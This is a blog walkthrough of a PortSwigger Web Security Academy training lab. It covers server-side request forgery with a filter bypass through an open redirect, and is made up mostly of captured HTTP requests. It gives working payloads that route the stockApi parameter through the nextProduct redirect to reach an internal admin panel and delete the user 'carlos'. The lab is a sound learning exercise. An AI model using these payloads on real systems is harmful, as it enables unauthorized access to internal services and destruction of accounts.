Skip to content

chojnowski.it

Port Swigger SSRF with filter bypass via open redi

Port Swigger SSRF with filter bypass via open redi

SSRF with filter bypass via open redirection vulnerability¶

Solution¶

Open the website: https://0a4f00d60401cb72819ed47500770068.web-security-academy.net/product?productId=1¶

https://0a4f00d60401cb72819ed47500770068.web-security-academy.net/product?productId=1

Click "Next product": https://0a9e00d60365060b8001e42600c10028.web-security-academy.net/product?productId=2¶

GET /product/nextProduct?currentProductId=1&path=/product?productId=2 HTTP/2
Host: 0a9e00d60365060b8001e42600c10028.web-security-academy.net
Cookie: session=Zc8boeBO6KdKbGEt7gu5xhO0KMz9dXg7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a9e00d60365060b8001e42600c10028.web-security-academy.net/product?productId=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

Input payload¶

Payload: /product/nextProduct?path=http://192.168.0.12:8080/admin

Old: /product/stock/check?productId=1&storeId=1
Old: /product/nextProduct?currentProductId=1&path=/product?productId=2
New: /product/nextProduct?path=http://192.168.0.12:8080/admin
---
POST /product/stock HTTP/2
Host: 0a9e00d60365060b8001e42600c10028.web-security-academy.net
Cookie: session=Zc8boeBO6KdKbGEt7gu5xhO0KMz9dXg7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a9e00d60365060b8001e42600c10028.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Origin: https://0a9e00d60365060b8001e42600c10028.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin

Delete user: carlos¶

Payload: /product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
---
POST /product/stock HTTP/2
Host: 0a9e00d60365060b8001e42600c10028.web-security-academy.net
Cookie: session=Zc8boeBO6KdKbGEt7gu5xhO0KMz9dXg7
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a9e00d60365060b8001e42600c10028.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: https://0a9e00d60365060b8001e42600c10028.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

Solved¶